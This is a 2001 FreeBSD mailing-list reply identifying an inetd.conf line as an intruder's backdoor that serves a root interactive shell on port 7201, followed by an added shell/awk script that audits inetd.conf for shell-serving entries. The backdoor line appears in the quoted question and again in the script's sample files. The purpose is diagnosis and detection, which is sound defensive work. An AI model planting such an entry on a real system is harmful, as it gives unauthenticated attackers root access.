Date: Tue, 31 Jul 2001 17:52:53 -0400 (EDT)
From: Jeff Palmer
To: Hayden Katzenellenbogen
Subject: Re: Extra Line in my inetd.conf
Message-ID: <20010731174952.B5845-100000@jeff.isni.net>
Sender: owner-freebsd-stable@FreeBSD.ORG

You have been hacked.

This line simply opens up a shell (/bin/sh) in interactive mode (-i) on the
port "dlip" as specified in your /etc/services file (typically 7201).

I'd advise taking that machine OFF the network and performing an audit.
Refer to online documentation on how to diagnose, analyze, and cure the
exploit the attacker used to penetrate your system. Then apply that
knowledge to the newly FORMATted machine. (Yes, I recommend a full
format/reinstall of the OS.)

Jeff Palmer
scorpio@drkshdw.org

On Tue, 31 Jul 2001, Hayden Katzenellenbogen wrote:

> I have noticed this line at the bottom of some of my inetd.conf files on a
> few of my machines.. it is though not commented out I have commented it out
> as well I have no idea what it does...
>
> anyone care to shed some light on this?
>
> #dlip stream tcp nowait root /bin/sh sh -i
>
> Thanks
> Hayden
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message
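An added example, not part of the original thread: a POSIX sh/awk check for the kind of entry discussed above, an inetd.conf line whose server program is a shell, resolved to its port through the services file. It also reports commented-out copies; the function names, the list of shell names and the sample files are assumptions constructed for illustration.

```sh
#!/bin/sh
# audit_inetd CONF SERVICES
# Report every inetd.conf entry, active or commented out, whose server
# program is a shell. Output: STATE SERVICE PORT/PROTO USER PROGRAM
audit_inetd() {
    awk '
    NR == FNR {                      # first file: services name -> port map
        sub(/#.*/, "")
        if (NF >= 2) {
            split($2, pp, "/")
            for (i = 1; i <= NF; i++)
                if (i != 2) port[$i " " pp[2]] = pp[1]   # name and aliases
        }
        next
    }
    {                                # second file: inetd.conf
        state = "ACTIVE"
        if (sub(/^[ \t]*#+[ \t]*/, "")) state = "COMMENTED"
        # fields: service socktype proto wait user program args...
        if (NF < 6 || ($2 != "stream" && $2 != "dgram")) next
        proto = $3; sub(/[46]+$/, "", proto)      # tcp4, tcp6, tcp46 -> tcp
        n = split($6, path, "/")
        if (path[n] !~ /^(sh|csh|tcsh|bash|ksh|zsh|ash|dash)$/) next
        key = $1 " " proto
        p = (key in port) ? port[key] : "?"
        split($5, u, ":")                         # user[:group]
        printf "%s %s %s/%s %s %s\n", state, $1, p, proto, u[1], $6
    }' "$2" "$1"
}

# Constructed sample files, not taken from any real host.
sample_audit() {
    tmp=$(mktemp -d) || return 1
    cat > "$tmp/services" <<'EOF'
ftp     21/tcp
dlip    7201/tcp    # port number as given in the reply above
EOF
    cat > "$tmp/inetd.conf" <<'EOF'
# Internet server configuration database (constructed sample)
ftp   stream tcp nowait root /usr/libexec/ftpd ftpd -l
dlip  stream tcp nowait root /bin/sh sh -i
#dlip stream tcp nowait root /bin/sh sh -i
EOF
    audit_inetd "$tmp/inetd.conf" "$tmp/services"
    rm -rf "$tmp"
}

sample_audit
```

On a real host the call would be `audit_inetd /etc/inetd.conf /etc/services`; any ACTIVE line means inetd hands a shell to whoever connects to that port, and a COMMENTED line is still evidence that the file was modified.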